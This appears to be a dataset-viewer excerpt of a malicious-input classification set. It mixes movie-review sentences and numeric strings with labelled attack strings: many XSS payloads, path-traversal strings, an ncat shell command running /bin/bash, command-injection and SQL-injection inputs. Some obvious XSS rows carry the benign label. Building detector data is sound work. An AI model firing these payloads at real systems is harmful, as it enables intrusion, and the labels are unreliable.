stringlengths 1
⌀ | label
int64 0
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int64 1
An often watchable, though goofy and lurid, blast of a costume drama set in the late 15th century. | 0 | 18,156 |
1.39963E+11 | 0 | 26,571 |
<style>@keyframes slidein {}</style><map style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></map> | 1 | 9,133 |
May seriously impair your ability to ever again maintain a straight face while speaking to a highway patrolman. | 0 | 16,946 |
So devoid of pleasure or sensuality that it cannot even be dubbed hedonistic. | 0 | 19,886 |
Neatly constructed thriller. | 0 | 24,637 |
<div draggable="true" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable style=display:block>drop here</fieldset> | 1 | 4,580 |
<source onpointerenter=alert(1) style=display:block>XSS</source> | 1 | 8,147 |
With little visible talent and no energy, Colin Hanks is in bad need of major acting lessons and maybe a little coffee. | 0 | 23,561 |
\..\..\..\WEB-INF\web.xml | 1 | 13,542 |
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1281)//></style> | 1 | 12,513 |
There is very little dread or apprehension, and though I like the creepy ideas, they are not executed with anything more than perfunctory skill. | 0 | 21,199 |
<hr onmousedown="alert(1)" style=display:block>test</hr> | 1 | 5,559 |
<rt onpointerdown=alert(1) style=display:block>XSS</rt> | 1 | 7,656 |
Director Tom Shadyac and star Kevin Costner glumly mishandle the story's promising premise of a physician who needs to heal himself. | 0 | 24,480 |
The town has kind of an authentic feel, but each one of these people stand out and everybody else is in the background and it just seems manufactured to me and artificial. | 0 | 19,833 |
Director of photography Benoit Delhomme shot the movie in delicious colors, and the costumes and sets are grand. | 0 | 15,590 |
<applet oncontextmenu="alert(1)" style=display:block>test</applet> | 1 | 3,119 |
...this isn't even a movie we can enjoy as mild escapism; it is one in which fear and frustration are provoked to intolerable levels. | 0 | 19,950 |
<a2 contenteditable onbeforeinput=alert(1)>test | 1 | 2,837 |
0.601684807 | 0 | 28,445 |
<embed src="javascript:alert(586)"> | 1 | 11,818 |
6.50065E+11 | 0 | 26,063 |
Not so much funny as aggressively sitcom-cute, it's full of throwaway one-liners, not-quite jokes, and a determined TV amiability that Allen personifies. | 0 | 21,437 |
<iframe onpointermove=alert(1) style=display:block>XSS</iframe> | 1 | 5,697 |
<caption onbeforecut="alert(1)" contenteditable>test</caption> | 1 | 3,801 |
A Jewish WW II doc that isn't trying simply to out-shock, out-outrage or out-depress its potential audience! Who knew... | 0 | 16,393 |
<command onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></command> | 1 | 4,076 |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | 1 | 2,515 |
Despite the film's bizarre developments, Hoffman keeps us riveted with every painful nuance, unexpected flashes of dark comedy and the character's gripping humanity. | 0 | 17,758 |
37104822551 | 0 | 26,217 |
A big, gorgeous, sprawling swashbuckler that delivers its diversions in grand, uncomplicated fashion. | 0 | 15,360 |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(580)//#">XXX</a></body> | 1 | 11,812 |
<iframe id=x style="transition:outline 1s" ontransitionend=alert(1) tabindex=1></iframe> | 1 | 5,669 |
0.163104557 | 0 | 27,534 |
It's as if Allen, at 66, has stopped challenging himself. | 0 | 23,899 |
Young Hanks and Fisk, who vaguely resemble their celebrity parents, bring fresh good looks and an ease in front of the camera to the work. | 0 | 16,139 |
<div draggable="true" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable style=display:block>drop here</footer> | 1 | 4,588 |
A slick, skillful little horror film. | 0 | 14,575 |
The acting is amateurish, the cinematography is atrocious, the direction is clumsy, the writing is insipid and the violence is at once luridly graphic and laughably unconvincing. | 0 | 22,957 |
<img onpointerover=alert(1) style=display:block>XSS</img> | 1 | 5,892 |
Shows moments of promise but ultimately succumbs to cliches and pat storytelling. | 0 | 23,741 |
There's a vastness implied in Metropolis that is just breathtaking. | 0 | 14,568 |
ncat 鈥搖dp 4242 -e /bin/bash | 1 | 14,186 |
Like Dickens with his passages, McGrath crafts quite moving scenes throughout his resolutely dramatic variation on the novel. | 0 | 14,772 |
<a href="javascript\x3A:javascript:alert(487)" id="fuzzelement487">test</a> | 1 | 11,719 |
Worth seeing just for Weaver and LaPaglia. | 0 | 18,179 |
echo wtfpfm$()\ xjffof\nz^xyu||a #' &echo wtfpfm$()\ xjffof\nz^xyu||a #|" &echo wtfpfm$()\ xjffof\nz^xyu||a # | 1 | 13,343 |
0.366054789 | 0 | 28,326 |
<style>@keyframes x{}</style><acronym style="animation-name:x" onwebkitanimationstart="alert(1)"></acronym> | 1 | 9,440 |
0.528620298 | 0 | 28,475 |
Nair does capture the complexity of a big family and its trials and tribulations... | 0 | 14,365 |
<dt draggable="true" ondragstart="alert(1)" style=display:block>test</dt> | 1 | 4,876 |
<img SRC="jav ascript:document.vulnerable=true;"> | 1 | 2,634 |
58461822983 | 0 | 26,022 |
<img \x47src=x onerror="javascript:alert(1522)"> | 1 | 12,754 |
0.017614293 | 0 | 27,983 |
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style="position:absolute;" onanimationcancel="print()"></hgroup> | 1 | 9,331 |
I was perplexed to watch it unfold with an astonishing lack of passion or uniqueness. | 0 | 21,965 |
This is a heartfelt story ... it just isn't a very involving one. | 0 | 23,433 |
<video><source onerror="javascript:javascript:alert(568)"> | 1 | 11,800 |
Too bad Maggio couldn't come up with a better script. | 0 | 20,013 |
It's about following your dreams, no matter what your parents think. Socrates motions for hemlock. | 0 | 21,025 |
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1233)"></applet onreadystatechange> | 1 | 12,465 |
<IMG SRC=\"livescript:[code]\"> | 0 | 969 |
<code onkeyup="alert(1)" contenteditable style=display:block>test</code> | 1 | 3,935 |
../../../../../../../../../../../../../../../../Windows/system.ini | 1 | 13,464 |
It's impossible to indulge the fanciful daydreams of Janice Beard (Eileen Walsh) when her real-life persona is so charmless and vacant. | 0 | 20,539 |
Solid, lump-in-the-throat family entertainment that derives its power by sticking to the facts. | 0 | 14,393 |
3.96468E+11 | 0 | 25,692 |
I was impressed by how many tit-for-tat retaliatory responses the filmmakers allow before pulling the plug on the conspirators and averting an American-Russian Armageddon. | 0 | 16,555 |
Abysmally pathetic | 0 | 24,762 |
Totally overwrought, deeply biased, and wholly designed to make you feel guilty about ignoring what the filmmakers clearly believe are The Greatest Musicians of All Time. | 0 | 24,197 |
<th onmouseout="alert(1)" style=display:block>test</th> | 1 | 10,490 |
It's a work by an artist so in control of both his medium and his message that he can improvise like a jazzman. | 0 | 15,684 |
<track onclick="alert(1)" style=display:block>test</track> | 1 | 10,682 |
From beginning to end, this overheated melodrama plays like a student film. | 0 | 20,056 |
Despite its title, Amy's Orgasm is not a porno, though it is as tedious as one. | 0 | 21,792 |
0.634175073 | 0 | 28,002 |
YFmQEqi1 | 0 | 25,440 |
0.598788193 | 0 | 27,252 |
<spacer onmouseenter="alert(1)" style=display:block>test</spacer> | 1 | 8,179 |
<script x> alert(834) </script 834=2 | 1 | 12,066 |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | 0 | 2,389 |
Notwithstanding my problem with the movie's final half hour, I'm going to recommend SECRETARY, based on the wonderful acting clinic put on by Spader and Gyllenhaal, and also the unique way Shainberg goes about telling what at heart is a sweet little girl- | 0 | 16,505 |
While surprisingly sincere, this average little story is adorned with some awesome action photography and surfing. | 0 | 15,114 |
0.529436969 | 0 | 27,340 |
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF | 1 | 1,641 |
<IMG SRC="jav&#x0A;ascript:alert(1849);"> | 0 | 13,080 |
'+document.location.href="about:blank"+' | 1 | 114,514 |
'+document.location.href=""+' | 1 | 114,515 |
' or 1=1; | 1 | 114,516 |
' or 1=1-- | 1 | 114,517 |
eval(exit()) | 1 | 114,518 |
Subsets and Splits